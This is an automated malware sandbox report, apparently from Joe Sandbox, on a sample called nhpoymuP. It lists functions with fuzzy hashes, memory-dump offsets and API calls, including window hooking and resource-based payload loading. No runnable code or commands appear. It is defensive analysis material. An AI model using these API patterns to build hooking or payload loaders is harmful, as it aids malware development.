Opcode ID: 345b5dac16e909de4a6bdf4d01fc869d1f10795fb305250766dd27f855f2e451
Instruction ID: ee6181b9c957d3f774354ee4702e6233a0f336dfe8016294544fc8bb77f40a29
Opcode Fuzzy Hash: 345b5dac16e909de4a6bdf4d01fc869d1f10795fb305250766dd27f855f2e451
Instruction Fuzzy Hash: 30D14B70A00219CFEB04CFADD984A9DBBF2FF89321F148565E825AB262D731E941CF51

Function 2BFACCB9 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|9+, xrefs: 2BFAD0C8

Memory Dump Source

Source File: 00000007.00000002.2976268913.000000002BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2BFA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2bfa0000_nhpoymuP.jbxd

Similarity

API ID:
String ID: |9+
API String ID: 0-3705304856
Opcode ID: 8622e15a1a7e17bef55bf04ffc0fab5c91ed0cadaf7c8c2b6aa604243e1e961d
Instruction ID: fac1de30c082df38120aea1e07b63d3246eb3d4370e3595b4196fbc26e40c6f1
Opcode Fuzzy Hash: 8622e15a1a7e17bef55bf04ffc0fab5c91ed0cadaf7c8c2b6aa604243e1e961d
Instruction Fuzzy Hash: 5CD16B36A00209DFDF08DFA9C984B9DBBF2BF44304F15C568E409AB2A5DB75E985CB40

Function 27A88F18 Relevance: 3.4, Strings: 2, Instructions: 897COMMON

Download Yara Rule

Strings

4'^q, xrefs: 27A899A3
(o^q, xrefs: 27A893A8

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: 5b96dbde9aea463cb5658e3e86113ff76f9924343fdb90494415d131fd995979
Instruction ID: 446ca717ab0baa28d18f92030380aa937d2c7f8643b0af82b94e96f0f6180e0c
Opcode Fuzzy Hash: 5b96dbde9aea463cb5658e3e86113ff76f9924343fdb90494415d131fd995979
Instruction Fuzzy Hash: 63828070A00209DFCB05CFA8C588A9EBBF6FF88320F158559E925DB262D735ED91CB51

Function 27A8B1DF Relevance: 2.7, Strings: 2, Instructions: 191COMMON

Download Yara Rule

Strings

PH^q, xrefs: 27A8B457
PH^q, xrefs: 27A8B446

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 0195231b599202e620a84c1ef2c8289643bd26d374c8ee3782ec68ec3413af32
Instruction ID: 4d49f68aa256784f933a4c40f8912523c09018e7922435fe60ee8c598ba9b718
Opcode Fuzzy Hash: 0195231b599202e620a84c1ef2c8289643bd26d374c8ee3782ec68ec3413af32
Instruction Fuzzy Hash: D8819174E01218CFDB18CFAAD984A9DBBF2BF89310F149069E418AB265DB349985CF51

Function 27A8B7A0 Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

PH^q, xrefs: 27A8BA17
PH^q, xrefs: 27A8BA06

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 7066ab20a694d9e30bed8d2739fbeb1ee339be2e2784e2a4f38eba230c6d3f15
Instruction ID: 6bc750bc0bdfda837d1c01c591c81dbf1e21779de9968c6cc62b60177669dbfe
Opcode Fuzzy Hash: 7066ab20a694d9e30bed8d2739fbeb1ee339be2e2784e2a4f38eba230c6d3f15
Instruction Fuzzy Hash: 29819174E01218CFDB14CFAAD994A9DBBF2BF88310F14D069E418AB365DB34A985CF51

Function 27A8AF00 Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

PH^q, xrefs: 27A8B166
PH^q, xrefs: 27A8B177

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 8d8b5073d7d3226c1dc573344e071edef61c55afd7890ba4cf50d49c3b5d3b06
Instruction ID: 13cb9b873c4abf77a2c0dac9d3086296ff45ba863993d92c6d580017c7fb6bff
Opcode Fuzzy Hash: 8d8b5073d7d3226c1dc573344e071edef61c55afd7890ba4cf50d49c3b5d3b06
Instruction Fuzzy Hash: E381B574E01218CFDB14CFAAC984A9DBBF2BF89310F14D069E818AB365DB359985CF50

Function 27A8B4C0 Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PH^q, xrefs: 27A8B726
PH^q, xrefs: 27A8B737

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: b5dfd6adaf4783ace17579352f727e1b09fc3c2ddbbdddaf01c6f133797beac9
Instruction ID: 5557df82da6729842f3c28317cd497cdc4fecc7f17614c9a88bcf33510b922c1
Opcode Fuzzy Hash: b5dfd6adaf4783ace17579352f727e1b09fc3c2ddbbdddaf01c6f133797beac9
Instruction Fuzzy Hash: 3B81B274E01218CFDB18CFAAD994A9DBBF2BF88310F14D069E419AB365DB349985CF11

Function 27A841EA Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PH^q, xrefs: 27A84458
PH^q, xrefs: 27A84447

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 8c4eb04897d0d62f0cfd15328dfb8a72ef3b6b2b05a0d293bec3e26bf0a166f5
Instruction ID: 10c152fffd8e837f38db5836eb9df26a5be7b7ca0d2953cde0546f44242818cf
Opcode Fuzzy Hash: 8c4eb04897d0d62f0cfd15328dfb8a72ef3b6b2b05a0d293bec3e26bf0a166f5
Instruction Fuzzy Hash: 42819574E00658CFDB08DFAAD994A9DBBF2FF89310F148069E419AB365DB349945CF10

Function 2B6F7808 Relevance: 2.0, APIs: 1, Instructions: 528COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2975158833.000000002B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B6F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b6f0000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f398950cf784537f41d6eb50655dec14e75cbe7f57caae0e1516c5737a9ac020
Instruction ID: 46b96e1fcf83f30299ba1c9e939b0075be101270827bc0c65e53bf9bfe3b43c0
Opcode Fuzzy Hash: f398950cf784537f41d6eb50655dec14e75cbe7f57caae0e1516c5737a9ac020
Instruction Fuzzy Hash: 2E224AB0E01219CFCB14DFA9C990BADBBB2BF88304F1085A9D519AB355DB349E85CF51

Function 2BFA0628 Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,?,?,?), ref: 2BFA06E1

Memory Dump Source

Source File: 00000007.00000002.2976268913.000000002BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2BFA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2bfa0000_nhpoymuP.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 8b7204a6db3e79feb94fc13c8610f5f08532962fa0c21b21eae14ebef0aa19de
Instruction ID: e40efc3bb669864907dfdd1430a8f4895401535e956dddb5f69c8fe66d067e95
Opcode Fuzzy Hash: 8b7204a6db3e79feb94fc13c8610f5f08532962fa0c21b21eae14ebef0aa19de
Instruction Fuzzy Hash: 1C4198B5D052189FCF14DFA9E980ADEFBB1AB59310F20942AE814B7320D735A945CF58

Function 2B6FB2A0 Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 2B6FB2F1

Memory Dump Source

Source File: 00000007.00000002.2975158833.000000002B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B6F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b6f0000_nhpoymuP.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee580b7b0a97096b0fa9bec3f8435acb220e1d180c8f043c3160b51d8e8a83f8
Instruction ID: abf6c8fb1463555ecbe1414318020f1d58a8d6076e5b1d346bf83233eaa60708
Opcode Fuzzy Hash: ee580b7b0a97096b0fa9bec3f8435acb220e1d180c8f043c3160b51d8e8a83f8
Instruction Fuzzy Hash: 4D4159B5E01209DBCB04CF99D584ADDFBF6BF88314F28D159E4056B285DB31A986CF90

Function 2BFA0630 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,?,?,?), ref: 2BFA06E1

Memory Dump Source

Source File: 00000007.00000002.2976268913.000000002BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2BFA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2bfa0000_nhpoymuP.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: d64a8952defb6d3b5ab0d69883e4e6b18f94d69aa0b18573234d3079ad496151
Instruction ID: 85f9810017bd6f14104ce95d2f17920a7d08585321217f2d6f81298f41ae6864
Opcode Fuzzy Hash: d64a8952defb6d3b5ab0d69883e4e6b18f94d69aa0b18573234d3079ad496151
Instruction Fuzzy Hash: AC4188B5D002189FCF14DFA9E984A9EFBB1AB49310F10902AE814B7320D774A945CF58

Function 27A8F0C8 Relevance: .7, Instructions: 711COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edafc452af11c4dd187fc3fbc0a3d45748716db1ce86f179f5c136b472c604bf
Instruction ID: bbd669c148a691de16c1be332f91451465e244c684637f62b5dae39145c44724
Opcode Fuzzy Hash: edafc452af11c4dd187fc3fbc0a3d45748716db1ce86f179f5c136b472c604bf
Instruction Fuzzy Hash: 4672BFB4E012698FDB64CF69C990BDDBBB2BB89314F1091E9E418A7351DB349E81CF40

Function 27A8D480 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118e01de95c090e59b88942c51944960b1553da3a7a787fa3cfb6023f3377dbc
Instruction ID: c9d025ef5ddfc63fc3e21196d2a848642ec8b1effb94f66b38dcd73aed343027
Opcode Fuzzy Hash: 118e01de95c090e59b88942c51944960b1553da3a7a787fa3cfb6023f3377dbc
Instruction Fuzzy Hash: FA51B674E00208DFDB08DFAAD594A9DBBF2FF89310F20902AE815AB365DB359845CF55

Function 27A8D490 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0be101e350eefbace48549ceb73f52269815c9ec6f97fe7c0d30e6b5d0eb344
Instruction ID: ff27a0a8fc6939aa890b00368a6a83f99f8b53f1576da028f1dec073494bff6a
Opcode Fuzzy Hash: d0be101e350eefbace48549ceb73f52269815c9ec6f97fe7c0d30e6b5d0eb344
Instruction Fuzzy Hash: 86519674E00208DFDB08DFAAD594A9DBBF2FF89310F209529E815AB364DB359945CF50

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

[, xrefs: 00401B37
:, xrefs: 00401B28
!, xrefs: 004020CF
*, xrefs: 004020E1
%, xrefs: 004020FA
E, xrefs: 00401E0F
), xrefs: 0040202E
x, xrefs: 0040214A
W, xrefs: 00402033
4, xrefs: 00402074
5, xrefs: 00402109
0, xrefs: 00401BBD
[, xrefs: 00402047
o, xrefs: 00402159
v, xrefs: 0040206A
W, xrefs: 00401B14
V, xrefs: 00402038
___, xrefs: 0040227D
4, xrefs: 00402136
x, xrefs: 00401B78
{, xrefs: 0040205B
., xrefs: 0040201F
o, xrefs: 00401B8D
6, xrefs: 004020C5
D, xrefs: 00401DFB
V, xrefs: 00401E19
o, xrefs: 00402097
x, xrefs: 00402088
., xrefs: 00401B0A
', xrefs: 00402006
h, xrefs: 00401A6F
v, xrefs: 0040212C
v, xrefs: 00401E4B
!, xrefs: 00401B1E
", xrefs: 00401B0F
8, xrefs: 00401BA9
_._, xrefs: 00402257
*, xrefs: 00401A1F
U, xrefs: 004020F5
!, xrefs: 0040201A
{, xrefs: 00401B4B
W, xrefs: 004020E6
{, xrefs: 0040211D
x, xrefs: 00401E69
', xrefs: 00401AF6
{, xrefs: 00401E3C
v, xrefs: 00401B5A
4, xrefs: 00401B64
W, xrefs: 00401B23

Memory Dump Source

Source File: 00000007.00000001.1828156271.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.1828156271.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78COMMON

Download Yara Rule

APIs

_fast_error_exit.LIBCMT ref: 0040CC41
__mtinit.LIBCMT ref: 0040CC47
_fast_error_exit.LIBCMT ref: 0040CC52
__RTC_Initialize.LIBCMT ref: 0040CC58
__ioinit.LIBCMT ref: 0040CC61
__amsg_exit.LIBCMT ref: 0040CC6C
GetCommandLineA.KERNEL32 ref: 0040CC72
___crtGetEnvironmentStringsA.LIBCMT ref: 0040CC7D
__setargv.LIBCMT ref: 0040CC87
__amsg_exit.LIBCMT ref: 0040CC92
__setenvp.LIBCMT ref: 0040CC98
__amsg_exit.LIBCMT ref: 0040CCA3
__cinit.LIBCMT ref: 0040CCAB
__amsg_exit.LIBCMT ref: 0040CCB6

Memory Dump Source

Source File: 00000007.00000001.1828156271.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.1828156271.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
String ID:
API String ID: 2598563909-0
Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C

Function 27A86580 Relevance: 10.5, Strings: 8, Instructions: 455
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 27A865BE
,bq, xrefs: 27A86A30
(o^q, xrefs: 27A866A5
(o^q, xrefs: 27A86A9F
,bq, xrefs: 27A86A20
(o^q, xrefs: 27A86679
(o^q, xrefs: 27A86742
(o^q, xrefs: 27A86A8F

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: 0b50e37a3bf9aab7fe9b198694d17cfa745d8f883da7d3ff56d4d1b276c38495
Instruction ID: 38166a61c1b7f0cb6bd82aee07d0538d0844bf802e3837411d91915176248277
Opcode Fuzzy Hash: 0b50e37a3bf9aab7fe9b198694d17cfa745d8f883da7d3ff56d4d1b276c38495
Instruction Fuzzy Hash: 00125C30A00648DFDB14CF69D584A9EBBF1BF88325F108569E529DB2A2DB31ED45CB50

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000007.00000001.1828156271.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.1828156271.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000007.00000001.1828156271.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.1828156271.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 27A87F18 Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

4'^q, xrefs: 27A87F67
4'^q, xrefs: 27A87F41

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: f8dbf4e4b8b8437db3f3731c411fd12c3886d77fa4262d7b334193acb8ec4f70
Instruction ID: ce27f5e026677649ed9e3fe501e183372acfa1acaff575d9d551ad3a9e07ccce
Opcode Fuzzy Hash: f8dbf4e4b8b8437db3f3731c411fd12c3886d77fa4262d7b334193acb8ec4f70
Instruction Fuzzy Hash: 31B19F30324605CFD7059B69C956B2A3BE6FFC8661F1400AAE531CF3A5EE69DC42C782

Function 27A85310 Relevance: 2.7, Strings: 2, Instructions: 233COMMON

Download Yara Rule

Strings

,bq, xrefs: 27A853F0
,bq, xrefs: 27A853E6

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: f57833a036cc993d80edf6df48d8426ec9a526124a131a69ce3f2a0f96a3f429
Instruction ID: 714463486796194b8c2890896375ae2f275d36a88adb7dc04aa61690c09c8150
Opcode Fuzzy Hash: f57833a036cc993d80edf6df48d8426ec9a526124a131a69ce3f2a0f96a3f429
Instruction Fuzzy Hash: 24919174B00525CFCB08CF69C49499EBBF3FF89226B248169E925EB361D731E841CB51

Function 27A82F20 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xbq, xrefs: 27A82F56
Xbq, xrefs: 27A82F2D

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: Xbq$Xbq
API String ID: 0-1243427068
Opcode ID: e110bd4d0520f92ef3aedacc1408b302878d6cd3a5b0d728e12b82876a4cbde6
Instruction ID: 71e5f04e52991609796f9a55fe83e88b77b75f95b055b7dc6ecb97e0241b3442
Opcode Fuzzy Hash: e110bd4d0520f92ef3aedacc1408b302878d6cd3a5b0d728e12b82876a4cbde6
Instruction Fuzzy Hash: C0310436704225CBDB0C4A6A899427FA6AABBC4321F144439E936D33D5DF79CD45C391

Function 27A80006 Relevance: 1.8, Strings: 1, Instructions: 563COMMON

Download Yara Rule

Strings

LR^q, xrefs: 27A802C3

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 2afedd8f9ec122b39f672080ca4d545b46676e39a6162a9e0ba9d314f4351507
Instruction ID: 0a8c7fc21d0f2e116a6fca7c504efc30ee8bd2a1bc6c75cf2851e3353a6a57a2
Opcode Fuzzy Hash: 2afedd8f9ec122b39f672080ca4d545b46676e39a6162a9e0ba9d314f4351507
Instruction Fuzzy Hash: 8762C878900259CFCB55DF64C9A5B9DBBB1FB89300F1082A9D809A7354DF786E86CF80

Function 27A80040 Relevance: 1.8, Strings: 1, Instructions: 541COMMON

Download Yara Rule

Strings

LR^q, xrefs: 27A802C3

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 21bcd86d591afe4798d36e77e7b167ee10ad2565f400a04e09b5b9d0b27de6bc
Instruction ID: bda22ac0ec5fa7a2b923627d44d04ba74df22cb1bb3398c6708e08098ce93035
Opcode Fuzzy Hash: 21bcd86d591afe4798d36e77e7b167ee10ad2565f400a04e09b5b9d0b27de6bc
Instruction Fuzzy Hash: 4252B878900259CFCB54DF64C995B9DBBB2FB88301F1086A9D809A7354DF786E86CF80

Function 2B6FB43C Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2975158833.000000002B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B6F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b6f0000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b831834e48d43dede8e066f68ba5657f2fa2f953e2fcb62ed063b97c96ced0a2
Instruction ID: 381625541b192bec8e7e3abe69858d1cebd1ffde0702ca3c90eb617e0225d16f
Opcode Fuzzy Hash: b831834e48d43dede8e066f68ba5657f2fa2f953e2fcb62ed063b97c96ced0a2
Instruction Fuzzy Hash: 48414AB5E4410ACFCB04CF98D5C0ADDBBB2FF58310F689159E40AAB286C735A986CF51

Function 2B6FB290 Relevance: 1.6, APIs: 1, Instructions: 105libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 2B6FB2F1

Memory Dump Source

Source File: 00000007.00000002.2975158833.000000002B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B6F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b6f0000_nhpoymuP.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 35b74b5e4c578d87f277c4eaa92fb937120b16fb02d422892a240289423b13b5
Instruction ID: 5bb34e09c9efb04c06b8455da8a249b9f9c3a4c8f12ac970435a6a3875f6d0d4
Opcode Fuzzy Hash: 35b74b5e4c578d87f277c4eaa92fb937120b16fb02d422892a240289423b13b5
Instruction Fuzzy Hash: 1741EFB1E092498FCB15CFA9C484BDDBFF2BF86310F2882A9D4056B296C7345986CF51

Function 2B6FB3DC Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2975158833.000000002B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B6F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b6f0000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b834bb30942793846e815a184597627690bc9c453977233a57bc986c2f02146
Instruction ID: e96a5ab3d991a581a2d4e4a5e4b817007583cf6f3b714e32b24c435138fde6c3
Opcode Fuzzy Hash: 8b834bb30942793846e815a184597627690bc9c453977233a57bc986c2f02146
Instruction Fuzzy Hash: AE4149B5E4410ACFCB04CF98D1C0AEDBBB2FF48354F289158E406AB286C735A986CF50

